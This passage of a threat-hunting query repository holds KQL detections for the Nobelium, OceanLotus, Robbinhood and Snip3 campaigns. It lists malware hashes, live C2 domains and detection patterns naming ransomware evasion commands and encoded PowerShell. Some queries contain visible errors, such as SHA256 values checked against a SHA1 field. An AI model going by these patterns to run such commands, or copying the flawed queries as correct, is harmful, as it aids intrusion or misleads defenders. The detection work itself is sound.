[*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query locates malicious Nobelium-associated DLLs that have been loaded into memory on affected systems. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceImageLoadEvents | where SHA1 in ("76640508b1e7759e548771a5359eaed353bf1eec","d130bd75645c2433f88ac03e73395fba172ef676","1acf3108bf1e376c8848fbb25dc87424f2c2a39c","e257236206e99f5a5c62035c9c59c57206728b28","6fdd82b7ca1c1f0ec67c05b36d14c9517065353b","2f1a5a7411d015d01aaee4535835400191645023","bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387","16505d0b929d80ad1680f993c02954cfd3772207","d8938528d68aabe1e31df485eb3f75c8a925b5d9","395da6d4f3c890295f7584132ea73d759bd9d094","c8b7f28230ea8fbf441c64fdd3feeba88607069e","2841391dfbffa02341333dd34f5298071730366a","2546b0e82aecfe987c318c7ad1d00f9fa11cd305","2dafddbfb0981c5aa31f27a298b9c804e553c7bc","e2152737bed988c0939c900037890d1244d9a30e","fd15760abfc0b2537b89adc65b1ff3f072e7e31c") or SHA256 in ("32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77","ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6","dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b","eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed","ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c","019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134","c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77","0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589","e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d","20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9","2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d","a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d","92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690","a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2","b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666","cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6","ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | v | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/oceanlotus-apt32-files.md ================================================ # Detect malicious documents associated with group known as "OceanLotus" This query was originally published in a threat analytics report about the group known to other security researchers as *APT32* or *OceanLotus* This tracked activity group uses a wide array of malicious documents to conduct attacks. Some of their favorite techniques include sideloading dynamic link libraries, and disguising payloads as image files. The group has weaponized files with exploits for the following vulnerabilities: * [CVE-2017-11882](https://nvd.nist.gov/vuln/detail/CVE-2017-11882) - [Software update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882) * [CVE-2017-0199](https://nvd.nist.gov/vuln/detail/CVE-2017-0199) - [Software update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199) The following query detects known malicious files associated with the group's campaigns. See [Detect malicious network activity associated with group known as "OceanLotus"](oceanlotus-apt32-network.md) for another query related to this group's activity. ## Query ```Kusto let MaliciousFiles=pack_array(//'KerrDown Lure Documents', 'b32b5f76e7386a65bd9220befb21e0c46d4084c4', 'c9d6b6fa37ca3d8cb57248993bb7c8a8fcd1bc89', 'bf127e2a526240c7e65f24c544dad820cebe6d88', '347f555857d56a5afd33cfa19f8b5c771eed2553', '26c86c777fc074f5bbad27084bcb3bbc7afff88e', '872d2f4ccc43c08f73e84647b3098ff044cdfb75', 'fb20427d0ac3cd4542755168886a96bde04c4f81', //'KerrDown Malware Downloader', '5f42b1771ce97679df78713292838c830e606e48', '72571ea4389af7a3a0e04d87327427d199f1d178', '3f2a7b5605262d8aa189c32a049756c6bfed589b', '220ea47d692afc196b5b913a9693323fd51f00f5', '85021e711d5c7d5bd968f6dfed7102ab4d8828e8', 'c9e101c77f67203dfef66d21f2fa6c8765a6c649', '3182141a8255baa5b82c0953dd4541c6f9f26a03', '2d92d6459ef83ddf006bff4046b1bab86161a26b', '6aef7916f1c5d1886db06fe2d4bf35614a0b921f', 'edd306617f1c7390a6bc067d3e8dfb44ac57287c', 'd8cd8068cb30605646258c7a0d9b47e00eac28c5', '36422fe35473cc28a14701e5d9dcff4c2426d0ae', //'OceanLotus Documents Exploiting CVE-2017-11882', 'd1357b284c951470066aaa7a8228190b88a5c7c3', '49dff13500116b6c085c5ce3de3c233c28669678', '9df3f0d8525edf2b88c4a150134c7699a85a1508', '50a755b30e8f3646f9476080f2c3ae1347f8f556', 'bb060e5e7f7e946613a3497d58fbf026ae7c369a', 'e2d949cf06842b5f7ae6b2dffaa49771a93a00d9', 'OceanLotus Malicious SFX Files', 'ac10f5b1d5ecab22b7b418d6e98fa18e32bbdeab', 'cd13210a142da4bc02da47455eb2cfe13f35804a', 'b4e6ddcd78884f64825fdf4710b35cdbeaabe8e2', 'cc918f0da51794f0174437d336e6f3edfdd3cbe4', '8b991d4f2c108fd572c9c2059685fc574591e0be', '3dfc3d81572e16ceaae3d07922255eb88068b91d', //'OceanLotus OCX Dropper Files', 'efac23b0e6395b1178bcf7086f72344b24c04dcc', '7642f2181cb189965c596964d2edf8fe50da742b', '377fdc842d4a721a103c32ce8cb4daf50b49f303', 'bd39591a02b4e403a25aae502648264308085ded', 'b998f1b92ed6246ded13b79d069aa91c35637dec', '83d520e8c3fdaefb5c8b180187b45c65590db21a', 'b744878e150a2c254c867bad610778852c66d50a', '77c42f66dadf5b579f6bcd0771030adc7aefa97c', //'Malicious PNG Loader Files Used By OceanLotus ', 'b58b7e8361e15fdc9fb21d0f7c26d5fc17241ff7', '5d5c1297415cc5746559182d91c9114700be07e2', '43191e81e1dcc9fac138fc1cc5e3aeb9b25cc1f4', //'Malicious DLL Files Used By OceanLotus ', 'fa6be68b59b204c9f5ae886a888627a190491cf7', '20c3a72ff476aa1fb71367e1d5dd6e0eb166167e', '9d39e11f48b3ed4df35f5e19dd00b47764c98bdd', '81c1aff8589dc1e556f68562d7154377c745a1d5', 'eb27eb72c4709d77db260b942d87ed486e271c93', 'a28095221fbaad64af7a098e3dda80f6f426b1c2', 'dabefa810a4febf4e7178df9d2ca2576333e04f2', 'e716a98a4f0ebd366ff29bd9164e81e7c39a7789', '89abb3d70f200d480f05162c6877fab64941c5dd', //'OceanLotus Documents Exploiting CVE-2017-0199', '928b391af8e029dd8bef4f6dd82223b961429f0d', '295a99bebb8122a0fc26086ecc115582f37f6b47', '8b9fc2281a604a0ef2d56591a79f9f9397a6a2d2', 'ec34a6b8943c110687ef6f39a838e68d42d24863', 'd8be4f41886666687caf69533e11193e65e2a8e5', 'd8be4f41886666687caf69533e11193e65e2a8e5', //'Malicious Documents Used By OceanLotus', '8b599ecdbec12a5bd76cf290f9297f13e8397d56', 'c9073998d2a202e944f21e973448062af4fd29c0', '91510b97f764296b16fc88f0195cec6e6f1604af', 'e00a4e0a03655dccff5ffdb4f4540115d820b5bb', 'd39a7ecf844545363b96b8ee2eda9b76d51d602b', //'JEShell Malware Downloader', '8cad6621901b5512f4ecab7a22f8fcc205d3762b', '668572ba2aff5374a3536075b01854678c392c04'); union DeviceFileEvents, DeviceProcessEvents | where Timestamp > ago(14d) | where SHA1 in(MaliciousFiles) or SHA1 in(MaliciousFiles) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | v | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/oceanlotus-apt32-network.md ================================================ # Detect malicious network activity associated with group known as "OceanLotus" This query was originally published in a threat analytics report about the group known to other security researchers as *APT32* or *OceanLotus* This tracked activity group uses a wide array of malicious documents to conduct attacks. Some of their favored techniques include sideloading dynamic link libraries, and disguising payloads as image files. The following query detects network activity that may indicate an attack by this group. See [Detect malicious documents associated with group known as "OceanLotus"](oceanlotus-apt32-files.md) for another query related to this group's activity. ## Query ```Kusto //Network activities DeviceNetworkEvents | where Timestamp > ago(30d) | where RemoteUrl in ( //'Malicious URL Indicators for OceanLotus Activities 2019', 'open.betaoffice.net', 'outlook.updateoffices.net', 'load.newappssystems.com', 'syn.servebbs.com', //'C2 Indicators for OceanLotus Activities 2019', 'cortanazone.com', 'cortanasyn.com', 'ristineho.com', 'syn.servebbs.com') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | v | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/possible-affected-software-orion[Nobelium].md ================================================ # Get an inventory of SolarWinds Orion software possibly affected by Nobelium This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query retrieves an inventory of SolarWinds Orion software use in your organization, organized by product name and ordered by how many devices the software is installed on. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceTvmSoftwareVulnerabilities | where SoftwareVendor == 'solarwinds' | where SoftwareName startswith 'orion' | summarize dcount(DeviceName) by SoftwareName | sort by dcount_DeviceName desc ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | Not all instances of SolarWinds Orion may be affected by Solorigate. | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/robbinhood-driver.md ================================================ # Detect loading of vulnerable drivers by Robbinhood ransomware campaign This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/). [Robbinhood](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Robinhood.A&ThreatID=2147735370) is ransomware that has been involved in several high-profile incidents, including a 2019 [attack](https://www.nytimes.com/2019/05/22/us/baltimore-ransomware.html) on the city of Baltimore, Maryland. Robbinhood operators often employ a distinctive defense evasion technique, where they load a vulnerable driver on to a target and exploit it, in order to turn off security software -- essentially using the driver as malware. The following query detects if a device contains the vulnerable drivers. These are often, but not always, implanted on the target by operators seeking to use this technique to turn off security software. For a query that detects a later stage of this technique, see [Detect security evasion related to the Robbinhood ransomware campaign](robbinhood-driver.md). ## Query ```Kusto DeviceFileEvents | where Timestamp > ago(7d) | where SHA1 in('0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/robbinhood-evasion.md ================================================ # Detect security evasion related to the Robbinhood ransomware campaign This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/). [Robbinhood](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Robinhood.A&ThreatID=2147735370) is ransomware that has been involved in several high-profile incidents, including a 2019 [attack](https://www.nytimes.com/2019/05/22/us/baltimore-ransomware.html) on the city of Baltimore, Maryland. Robbinhood operators often employ a distinctive defense evasion technique, where they load a vulnerable driver on to a target and exploit it, in order to turn off security software -- essentially using the driver as malware. The following query detects a late stage of this technique, when the operator is issuing commands to turn off the driver. For a query that detects an earlier stage of this technique, see [Detect loading of vulnerable drivers by Robbinhood ransomware campaign](robbinhood-driver.md). ## Query ```Kusto // RobbinHood execution and security evasion DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName =~ "winlogon.exe" | where FileName == "cmd.exe" and ProcessCommandLine has_any("taskkill", "net", "robbin", "vssadmin", "bcdedit", "wevtutil") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/snip3-aviation-targeting-emails.md ================================================ # Detect keywords associated with Snip3 campaign emails Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks for keywords observed in emails involved in a Snip3-associated campaign in April and May of 2021. The emails often have an aviation theme, and the campaign primarily targets organizations involved in travel or aviation. Note that keywords may change overtime. These emails were used to send malicious legitimate hosting provider links that redirected to VBS documents hosting loaders. The loaders initiate RevengeRAT or AsyncRAT downloads that eventually establish persistence on targets and exfiltrate data. ## Query ```kusto let SubjectTerms = pack_array("Cargo Charter","Airbus Meeting","WorldWide Symposium","Airbus Family","Flight Request", "Advice from NetJets","May/ACMI","AIRCRAFT PRESENTATION","Airworthiness", "Air Quote", "RFQ #9B17811"); EmailEvents | where SenderDisplayName has_any(SubjectTerms) // Optional Sender restriction for organizations with high FP // where SenderIpv4 == "192.145.239.18" | where EmailDirection == "Inbound" | join EmailUrlInfo on $left.NetworkMessageId == $right.NetworkMessageId | where Url has_any("drive.google.com","1drv.ms","onedrive.live.com") | take 100 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/snip3-detectsanboxie-function-call.md ================================================ # Detect Snip3 loader call to DetectSandboxie function Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks for a function call to a method named *DetectSandboxie*. This method is used in RevengeRAT and AsyncRAT instances involved in a campaign targeting the aviation industry, first observed in 2021. It has also been associated in the past other malware, such as WannaCry and QuasarRAT. Individual PowerShell functions can be detected in the same way in some instances, though care should be taken to ensure that the command name is unique -- otherwise, this query may return many false positives. ## Query ```kusto DeviceEvents | where ActionType == "PowerShellCommand" | where AdditionalFields == "{\"Command\":\"DetectSandboxie\"}" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/snip3-encoded-powershell-structure.md ================================================ # Detect Snip3 loader-encoded PowerShell command Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks for the method that Snip3 malware use to obfuscate PowerShell commands with UTF8 encoding. This technique is intended to evade detection from security products, and avoids the more standard switches used for encoding in malware such as Emotet. At present, this method of encoding is much more rare, being seen largely with loader installation of RevengeRAT, AsyncRAT and other RATs used in campaigns targeting the aviation industry. ## Query ```kusto DeviceFileEvents | where InitiatingProcessFileName =~ "powershell.exe" | where InitiatingProcessCommandLine has_all ("IEX","Text.Encoding","UTF8.GetString(@") | where InitiatingProcessCommandLine has_any ("Unrestricted","Hidden") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/snip3-malicious-network-connectivity.md ================================================ # Detect malicious use of RegAsm, RegSvcs, and InstallUtil by Snip3 Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks for potentially hollowed processes that may be used to facilitate command-and-control or exfiltration by Snip3 malware. This technique has been used in recent cases to exfiltrate data, including credentials. The query may return additional malware or campaigns not necessarily associated with Snip3. However, Microsoft recommends triaging all non-benign results as potential malware. ## Query ```kusto DeviceNetworkEvents | where InitiatingProcessFileName in ("RegSvcs.exe","RegAsm.exe", "InstallUtil.exe") | where InitiatingProcessCommandLine in ("\"RegAsm.exe\"","\"RegSvcs.exe\"","\"InstallUtil.exe\"") | where InitiatingProcessParentFileName endswith "Powershell.exe" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | v | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/snip3-revengerat-c2-exfiltration.md ================================================ # Detect Snip3 associated communication protocols Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks for network connections using any protocols associated with recent RevengeRAT, AsyncRAT, and other malware campaigns targeting the aviation industry. This activity is often followed by connections to copy-and-paste sites such as pastebin.com, stikked.ch, academia.edu, and archive.org. Many of these connections will occur on non-standard ports. ## Query ```kusto DeviceNetworkEvents | where RemoteUrl in ("mail.alamdarhardware.com","kexa600200.ddns.net","h0pe1759.ddns.net","n0ahark2021.ddns.net"," kimjoy007.dyndns.org"," kimjoy.ddns.net"," asin8988.ddns.net"," asin8989.ddns.net", "asin8990.ddns.net") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | v | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Collection/Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md ================================================ # Anomalous use of MailItemAccess on other users' mailboxes [Nobelium] This query looks for users accessing multiple other users' mailboxes, or accessing multiple folders in another user's mailbox. This query is inspired by an Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/OfficeActivity/AnomolousUserAccessingOtherUsersMailbox.yaml). ## Query ```Kusto // Adjust this value to exclude historical activity as known good let LookBack = 30d; // Adjust this value to change hunting timeframe let TimeFrame = 14d; // Adjust this value to alter how many mailbox (other than their own) a user needs to access before being included in results let UserThreshold = 1; // Adjust this value to alter how many mailbox folders in other's email accounts a users needs to access before being included in results. let FolderThreshold = 5; let relevantMailItems = materialize ( CloudAppEvents | where Timestamp > ago(LookBack) | where ActionType == "MailItemsAccessed" | where RawEventData['ResultStatus'] == "Succeeded" | extend UserId = tostring(RawEventData['UserId']) | extend MailboxOwnerUPN = tostring(RawEventData['MailboxOwnerUPN']) | where tolower(UserId) != tolower(MailboxOwnerUPN) | extend Folders = RawEventData['Folders'] | where isnotempty(Folders) | mv-expand parse_json(Folders) | extend foldersPath = tostring(Folders.Path) | where isnotempty(foldersPath) | extend ClientInfoString = RawEventData['ClientInfoString'] | extend MailBoxGuid = RawEventData['MailboxGuid'] | extend ClientIP = iif(IPAddress startswith "[", extract("\\[([^\\]]*)", 1, IPAddress), IPAddress) | project Timestamp, ClientIP, UserId, MailboxOwnerUPN, tostring(ClientInfoString), foldersPath, tostring(MailBoxGuid) ); let relevantMailItemsBaseLine = relevantMailItems | where Timestamp between(ago(LookBack) .. ago(TimeFrame)) | distinct 